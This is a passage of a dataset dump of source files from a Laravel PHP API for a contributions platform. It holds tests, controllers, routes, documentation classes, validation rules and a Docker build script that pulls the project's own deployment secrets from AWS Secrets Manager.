$endUser->id]);\n $audit = factory(Audit::class)->create(['user_id' => $endUser->user->id]);\n $notification = factory(Notification::class)->create(['user_id' => $endUser->user->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $this->assertDatabaseMissing('end_users', ['id' => 
$endUser->id]);\n $this->assertDatabaseMissing('users', ['id' => $endUser->user->id]);\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('audits', ['id' => $audit->id]);\n $this->assertDatabaseMissing('notifications', ['id' => $notification->id]);\n }\n\n /** @test */\n public function database_records_and_relationships_not_deleted_for_soft_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n $contribution = factory(Contribution::class)->create(['end_user_id' => $endUser->id]);\n $audit = factory(Audit::class)->create(['user_id' => $endUser->user->id]);\n $notification = factory(Notification::class)->create(['user_id' => $endUser->user->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'soft_delete']);\n\n $this->assertDatabaseHas('end_users', ['id' => $endUser->id]);\n $this->assertSoftDeleted('users', ['id' => $endUser->user->id]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseHas('audits', ['id' => $audit->id]);\n $this->assertDatabaseHas('notifications', ['id' => $notification->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_force_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Force deleted end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_soft_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'soft_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Soft deleted end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6133056282997131,
"alphanum_fraction": 0.6174635887145996,
"avg_line_length": 19.913043975830078,
"blob_id": "04fe5426d524910aa12c07906ef844e64012d86d",
"content_id": "973fd93a00e0eb1b1765572c1f1b72d4ba87be7d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 481,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 23,
"path": "/app/Support/Pagination.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse Illuminate\\Support\\Facades\\Config;\n\nclass Pagination\n{\n /**\n * @param int|null $perPage\n * @return int\n */\n public function perPage(int $perPage = null): int\n {\n $perPage = $perPage ?? Config::get('connecting_voices.pagination.default');\n $perPage = max($perPage, 1);\n $perPage = min($perPage, Config::get('connecting_voices.pagination.max'));\n\n return $perPage;\n }\n}\n"
},
{
"alpha_fraction": 0.5982708930969238,
"alphanum_fraction": 0.5988472700119019,
"avg_line_length": 32.36538314819336,
"blob_id": "c5384289e04ef4372de143279ebf0a691fd786bc",
"content_id": "371cc169cd7fc65ee2ddac28fb298a75b2a91cde",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1735,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 52,
"path": "/app/Docs/Operations/Tags/IndexTagOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Tags;\n\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Tag\\TagSchema;\nuse App\\Docs\\Tags\\TagsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexTagOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all tags')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n 'This endpoint does not return a paginated set, but instead all tags at once.'\n )\n )\n ->tags(TagsTag::create())\n ->noSecurity()\n ->parameters(\n SortParameter::create(null, ['name'], 'name')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n Schema::object()->properties(\n Schema::array('data')->items(TagSchema::create())\n )\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6684027910232544,
"avg_line_length": 19.571428298950195,
"blob_id": "f526df78724a0277bed0a8877fdaeaef43067566",
"content_id": "aa2fc1ce35b2cecae1092482ea8d6cb1b9c3a36d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Relationships/AuditRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Laravel\\Passport\\Client;\n\ntrait AuditRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function client(): BelongsTo\n {\n return $this->belongsTo(Client::class, 'client_id');\n }\n}\n"
},
{
"alpha_fraction": 0.6223776340484619,
"alphanum_fraction": 0.6270396113395691,
"avg_line_length": 24.235294342041016,
"blob_id": "40f50af4ca43a7c7aee0926bd24c39359c4733f4",
"content_id": "c2584c6d836dd41d134a4799a9fbd7b8a0ebfa53",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 429,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 17,
"path": "/database/factories/AuditFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Audit;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Audit::class, function (Faker $faker): array {\n return [\n 'action' => Audit::ACTION_READ,\n 'description' => $faker->paragraph,\n 'ip_address' => $faker->ipv4,\n 'created_at' => Date::now(),\n ];\n});\n"
},
{
"alpha_fraction": 0.6463909149169922,
"alphanum_fraction": 0.6472019553184509,
"avg_line_length": 26.399999618530273,
"blob_id": "c61eefe5921afcd4e5444c02de5d44a97370202f",
"content_id": "8d18532a5a6b43954283e3a6e12c6bbed2fb7807",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1233,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 45,
"path": "/app/Listeners/EndUserEventSubscriber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse App\\Events\\EndUser\\EndUserCreated;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Setting;\nuse App\\VariableSubstitution\\Email\\Admin\\NewEndUserSubstituter;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass EndUserEventSubscriber extends EventSubscriber\n{\n /**\n * @return string[]\n */\n protected function mapping(): array\n {\n return [\n EndUserCreated::class => 'handleEndUserCreated',\n ];\n }\n\n /**\n * @param \\App\\Events\\EndUser\\EndUserCreated $event\n */\n public function handleEndUserCreated(EndUserCreated $event): void\n {\n // Email verification to end users.\n $event->getEndUser()->user->sendEmailVerificationNotification();\n\n // Email to admins.\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n Config::get('connecting_voices.admin_email'),\n Arr::get($emailContent, 'admin.new_end_user.subject'),\n Arr::get($emailContent, 'admin.new_end_user.body'),\n new NewEndUserSubstituter($event->getEndUser())\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.6844174265861511,
"alphanum_fraction": 0.6872766017913818,
"avg_line_length": 37.86111068725586,
"blob_id": "ec31a02212547e602ad7f708001c3391011856d1",
"content_id": "f1a1cf60210a5b069cb4954917bc4cf8fed001f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2798,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 72,
"path": "/docker/build.sh",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Requires the following environment variables:\n# $TRAVIS_BUILD_DIR = The directory of the project.\n# $TRAVIS_COMMIT = The commit hash of the build.\n# $REPO_URI = The URI of the Docker repo to tag the image with.\n# $ENV_SECRET_ID = The ID of the .env file in AWS Secrets Manager (defaults to \".env\").\n# $PUBLIC_KEY_SECRET_ID = The ID of the OAuth public key file in AWS Secrets Manager (default to \"oauth-public.key\").\n# $PRIVATE_KEY_SECRET_ID = The ID of the OAuth private key file in AWS Secrets Manager (default to \"oauth-private.key\").\n\n# Bail out on first error.\nset -e\n\n# Package the app.\necho \"Packaging the app...\"\ncd ${TRAVIS_BUILD_DIR}\n# We can use `archive` which makes use of .gitattributes to `export-ignore` extraneous files.\ngit archive --format=tar --worktree-attributes ${TRAVIS_COMMIT} | tar -xf - -C ${TRAVIS_BUILD_DIR}/docker/app/packaged\n\n# Production Build Steps.\necho \"Installing composer dependencies...\"\ncd ${TRAVIS_BUILD_DIR}/docker/app/packaged\n./develop composer install --no-dev --optimize-autoloader\n\necho \"Installing NPM dependencies...\"\n./develop npm ci\n\necho \"Compiling assets...\"\n./develop npm run prod\ndocker run --rm \\\n -w /opt \\\n -v ${TRAVIS_BUILD_DIR}/docker/app/packaged:/opt \\\n ubuntu:16.04 bash -c \"rm -rf node_modules\"\n\n# Get the .env file.\necho \"Downloading .env file...\"\naws secretsmanager get-secret-value \\\n --secret-id ${ENV_SECRET_ID} | \\\n python -c \"import json,sys;obj=json.load(sys.stdin);print obj['SecretString'];\" > .env\n\n# Get the OAuth keys.\necho \"Downloading public OAuth key...\"\naws secretsmanager get-secret-value \\\n --secret-id ${PUBLIC_KEY_SECRET_ID} | \\\n python -c \"import json,sys;obj=json.load(sys.stdin);print obj['SecretString'];\" > storage/oauth-public.key\n\necho \"Downloading private OAuth key...\"\naws secretsmanager get-secret-value \\\n --secret-id ${PRIVATE_KEY_SECRET_ID} | \\\n python -c \"import json,sys;obj=json.load(sys.stdin);print obj['SecretString'];\" > storage/oauth-private.key\n\n# Build the Docker image with latest code.\necho \"Building Docker images...\"\ncd ${TRAVIS_BUILD_DIR}/docker/app\ndocker build \\\n -t ${REPO_URI}:latest \\\n -t ${REPO_URI}:${TRAVIS_COMMIT} .\n\n# Clean up packaged directory, but only if not in CI environment.\necho \"Cleaning up...\"\ncd ${TRAVIS_BUILD_DIR}/docker/app/packaged\nPWD=$(pwd)\nif [[ \"$PWD\" == \"$TRAVIS_BUILD_DIR/docker/app/packaged\" ]]; then\n # The \"vendor\" directory (any any built assets!) will be owned\n # as user \"root\" on the Linux file system\n # So we'll use Docker to delete them with a one-off container\n docker run --rm \\\n -w /opt \\\n -v ${TRAVIS_BUILD_DIR}/docker/app/packaged:/opt \\\n ubuntu:16.04 bash -c \"rm -rf ./* && rm -rf ./.git* && rm .env*\"\n echo -e \"*\\n!.gitignore\\n\" > .gitignore\nfi\n"
},
{
"alpha_fraction": 0.5587703585624695,
"alphanum_fraction": 0.5591319799423218,
"avg_line_length": 39.07246398925781,
"blob_id": "4203ed144c9d4acf46a825aa0639779d8e0d57e9",
"content_id": "0750d337115d7ac51e458c251c4e5e15825ce93b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2765,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 69,
"path": "/app/Http/Requests/Setting/UpdateSettingRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Setting;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\n\nclass UpdateSettingRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n /*\n * Frontend content.\n */\n 'frontend_content' => ['bail', 'array'],\n\n 'frontend_content.home_page' => ['bail', 'array'],\n 'frontend_content.home_page.title' => ['bail', 'string'],\n\n /*\n * Email content.\n */\n 'email_content' => ['bail', 'array'],\n\n 'email_content.admin' => ['bail', 'array'],\n\n 'email_content.admin.new_contribution' => ['bail', 'array'],\n 'email_content.admin.new_contribution.subject' => ['bail', 'string'],\n 'email_content.admin.new_contribution.body' => ['bail', 'string'],\n\n 'email_content.admin.updated_contribution' => ['bail', 'array'],\n 'email_content.admin.updated_contribution.subject' => ['bail', 'string'],\n 'email_content.admin.updated_contribution.body' => ['bail', 'string'],\n\n 'email_content.admin.new_end_user' => ['bail', 'array'],\n 'email_content.admin.new_end_user.subject' => ['bail', 'string'],\n 'email_content.admin.new_end_user.body' => ['bail', 'string'],\n\n 'email_content.admin.password_reset' => ['bail', 'array'],\n 'email_content.admin.password_reset.subject' => ['bail', 'string'],\n 'email_content.admin.password_reset.body' => ['bail', 'string'],\n\n 'email_content.end_user' => ['bail', 'array'],\n\n 'email_content.end_user.email_confirmation' => ['bail', 'array'],\n 'email_content.end_user.email_confirmation.subject' => ['bail', 'string'],\n 'email_content.end_user.email_confirmation.body' => ['bail', 'string'],\n\n 'email_content.end_user.password_reset' => ['bail', 'array'],\n 'email_content.end_user.password_reset.subject' => ['bail', 'string'],\n 'email_content.end_user.password_reset.body' => ['bail', 'string'],\n\n 'email_content.end_user.contribution_approved' => ['bail', 'array'],\n 'email_content.end_user.contribution_approved.subject' => ['bail', 'string'],\n 'email_content.end_user.contribution_approved.body' => ['bail', 'string'],\n\n 'email_content.end_user.contribution_rejected' => ['bail', 'array'],\n 'email_content.end_user.contribution_rejected.subject' => ['bail', 'string'],\n 'email_content.end_user.contribution_rejected.body' => ['bail', 'string'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5351452827453613,
"alphanum_fraction": 0.5360824465751648,
"avg_line_length": 36.438594818115234,
"blob_id": "0be881493b63e75530c1735a67e55753b403cb79",
"content_id": "b156c3c391884517d72cdc01120950b6598f7836",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2134,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 57,
"path": "/routes/api.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Support\\Facades\\Route;\n\n/*\n|--------------------------------------------------------------------------\n| API Routes\n|--------------------------------------------------------------------------\n|\n| Here is where you can register API routes for your application. These\n| routes are loaded by the RouteServiceProvider within a group which\n| is assigned the \"api\" middleware group. Enjoy building your API!\n|\n*/\n\nRoute::prefix('v1')\n ->group(\n function (): void {\n Route::get('admins/me', 'Admin\\\\MeController')\n ->name('admins.me');\n Route::apiResource('admins', 'AdminController');\n\n Route::apiResource('audits', 'AuditController')\n ->only('index', 'show');\n\n Route::apiResource('contributions', 'ContributionController');\n Route::put('contributions/{contribution}/approve', 'Contribution\\\\ApproveController')\n ->name('contributions.approve');\n Route::put('contributions/{contribution}/reject', 'Contribution\\\\RejectController')\n ->name('contributions.reject');\n\n Route::get('end-users/me', 'EndUser\\\\MeController')\n ->name('end-users.me');\n Route::apiResource('end-users', 'EndUserController');\n\n Route::post('exports/{type}/request', 'Export\\\\RequestController')\n ->name('exports.request');\n\n Route::get('files/{file}/download', 'File\\\\DownloadController')\n ->name('files.download');\n Route::post('files/{file}/request', 'File\\\\RequestController')\n ->name('files.request');\n\n Route::apiResource('notifications', 'NotificationController')\n ->only('index', 'show');\n\n Route::get('settings', 'SettingController@index')\n ->name('settings.index');\n Route::put('settings', 'SettingController@update')\n ->name('settings.update');\n\n Route::apiResource('tags', 'TagController')\n ->only('index', 'store', 'show', 'destroy');\n }\n );\n"
},
{
"alpha_fraction": 0.6555555462837219,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8,
"blob_id": "647eb45a5c1c9157cbd8a3b305c76eeba6e1c15f",
"content_id": "0e5fb0b6c1ec016a24d546d0c9ff0cac236df2b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/TagScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait TagScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6026041507720947,
"alphanum_fraction": 0.6031249761581421,
"avg_line_length": 36.64706039428711,
"blob_id": "b2b11c94a0da65ea8236ac7dd9853d0c7ad2fb18",
"content_id": "01685476894140ebca544a3ba21ac0eeaf159220",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1920,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 51,
"path": "/app/Docs/Operations/Files/DownloadFileOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Files;\n\nuse App\\Docs\\Tags\\FilesTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass DownloadFileOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Download a specific file')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n <<<'EOT'\n * Public files are accessible from the public.\n * Private files require the `token` parameter which must be requested.\n EOT\n )\n )\n ->tags(FilesTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::pdf()->schema(Schema::string()->format(Schema::FORMAT_BINARY)),\n MediaType::jpeg()->schema(Schema::string()->format(Schema::FORMAT_BINARY)),\n MediaType::png()->schema(Schema::string()->format(Schema::FORMAT_BINARY)),\n MediaType::create()->mediaType('application/zip')->schema(\n Schema::string()->format(Schema::FORMAT_BINARY)\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6795302033424377,
"alphanum_fraction": 0.681208074092865,
"avg_line_length": 25.488889694213867,
"blob_id": "da3babdde381b88789bb4e656b3669a7228a86e7",
"content_id": "4d5d10d370d60abd7a106710ce1dc94a8681998d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1192,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 45,
"path": "/app/Http/Controllers/V1/EndUser/MeController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\EndUser;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\EndUserResource;\nuse App\\Models\\EndUser;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\nclass MeController extends ApiController\n{\n /**\n * MeController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware('auth:api');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(Request $request): JsonResource\n {\n $this->authorize('me', EndUser::class);\n\n $endUser = $request->user('api')->endUser;\n\n event(EndpointInvoked::onRead($request, \"Viewed end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n}\n"
},
{
"alpha_fraction": 0.6908023357391357,
"alphanum_fraction": 0.6927592754364014,
"avg_line_length": 21.217391967773438,
"blob_id": "38729472a775d0e3d6746ff13232f36ecefa3151",
"content_id": "44e19a1eb6a8f3421da686e910621d33f248db7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 23,
"path": "/app/Exceptions/InvalidExporterException.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exceptions;\n\nuse App\\Exporters\\BaseExporter;\nuse RuntimeException;\n\nclass InvalidExporterException extends RuntimeException\n{\n /**\n * ExporterNotFoundException constructor.\n *\n * @param string $exporterClass\n */\n public function __construct(string $exporterClass)\n {\n $baseExporterClass = BaseExporter::class;\n\n parent::__construct(\"Exporter class [{$exporterClass}] must be an instance of [{$baseExporterClass}].\");\n }\n}\n"
},
{
"alpha_fraction": 0.668443500995636,
"alphanum_fraction": 0.6695095896720886,
"avg_line_length": 27.86153793334961,
"blob_id": "35a26940b54e5f21026d1a95d46a640dd69674b4",
"content_id": "8c10df3fbd2ff542f51b1a251b2ec117138f2485",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1876,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 65,
"path": "/app/Http/Controllers/V1/Export/RequestController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Export;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Export\\RequestExportRequest;\nuse App\\Http\\Resources\\ExportResource;\nuse App\\Models\\Export;\nuse App\\Services\\ExportService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\JsonResponse;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass RequestController extends ApiController\n{\n /**\n * @var \\App\\Services\\ExportService\n */\n protected $exportService;\n\n /**\n * RequestController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\ExportService $exportService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n ExportService $exportService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n\n $this->exportService = $exportService;\n }\n\n /**\n * @param \\App\\Http\\Requests\\Export\\RequestExportRequest $request\n * @param string $type\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function __invoke(RequestExportRequest $request, string $type): JsonResponse\n {\n $this->authorize('request', [Export::class, $type]);\n\n $export = DB::transaction(function () use ($request, $type): Export {\n return $this->exportService->create($type, $request->user('api')->admin);\n });\n\n event(EndpointInvoked::onCreate($request, \"Requested export [{$type}].\"));\n\n return (new ExportResource($export))\n ->toResponse($request)\n ->setStatusCode(Response::HTTP_CREATED);\n }\n}\n"
},
{
"alpha_fraction": 0.7129629850387573,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 9.800000190734863,
"blob_id": "6bf7058e3f5c633a35be9d12d3079263ae1c40e9",
"content_id": "efc41bd9d9ad9905c53012bc6e4baf2aca20a581",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 10,
"path": "/app/Models/Relationships/SettingRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\ntrait SettingRelationships\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6902984976768494,
"alphanum_fraction": 0.6915422677993774,
"avg_line_length": 27.714284896850586,
"blob_id": "da25349cbb2112edb7b8c87726979c2b5f64a5cb",
"content_id": "654616e845607854943e0aaf24eed4b40b569438",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 804,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/Tags/TagsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Tags;\n\nuse App\\Docs\\Operations\\Tags\\IndexTagOperation;\nuse App\\Docs\\Operations\\Tags\\StoreTagOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass TagsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/tags')\n ->operations(\n IndexTagOperation::create(),\n StoreTagOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.606521725654602,
"alphanum_fraction": 0.6086956262588501,
"avg_line_length": 28.677419662475586,
"blob_id": "fd8c0b368584f369ca01945d1b2701ac98043b9a",
"content_id": "f93e7cbb51b59ed54b098014466041a2e5a5928b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 920,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 31,
"path": "/app/Docs/Info.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Contact;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Info as BaseInfo;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass Info extends BaseInfo\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Info\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->title(Config::get('app.name') . ' API')\n ->description('Documentation on how to use the API')\n ->contact(\n Contact::create()\n ->name(Config::get('ayup.name'))\n ->url(Config::get('ayup.url'))\n ->email(Config::get('ayup.email'))\n )\n ->version('v1');\n }\n}\n"
},
{
"alpha_fraction": 0.5827505588531494,
"alphanum_fraction": 0.5850815773010254,
"avg_line_length": 16.15999984741211,
"blob_id": "3a4c6a04933ade7b3e7c5044b9c8e73cc94298d3",
"content_id": "4e634f1c61300e5060d3bf43dab8fde9fb9c6e95",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 429,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 25,
"path": "/app/Models/Mutators/SettingMutators.php",
